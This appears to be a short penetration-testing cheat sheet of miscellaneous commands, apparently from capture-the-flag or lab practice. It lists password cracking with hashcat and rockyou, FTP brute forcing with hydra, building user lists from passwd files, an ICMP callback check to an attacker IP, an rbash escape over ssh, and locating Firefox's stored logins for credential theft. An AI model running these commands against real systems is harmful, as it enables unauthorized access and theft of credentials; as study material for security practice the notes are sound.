Miscellaneous
Last updated
Was this helpful?
Last updated
Was this helpful?
hashcat -a 0 -m 500 hash /root/Downloads/rockyou.txt --force
scp important.txt ubuntu@192.168.1.30:/home/ubuntu/transferred.txt
wget -m ftp://ftpuser:givemefiles777@10.10.94.48
python -m pyftpdlib 21 hydra -e nsr -l elly ftp://192.168.249.148
Turn passwd file into userlist to use in bruteforce: cut -d ":" -f 1 passwd > userlist
Start a tcpdump listener on your local machine.
If using your own machine with the VPN connection, use:
sudo tcpdump ip proto \\icmp -i tun0
If using the Ethernet, use:
sudo tcpdump ip proto \\icmp -i eth0
This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.
ping <ATTACKER IP> -c 4
If we know the ssh credentials of the user who is part of rbash shell, then you can use the following command along ssh to break the jail and bypass the rbash by accessing proper bash shell.
ssh seppuku@192.168.53.90 -t "bash --noprofile"
.mozilla
directory, which holds firefox’s history of it’s user can be used to get credentials.
logins.json
holds the encrypted login credentials.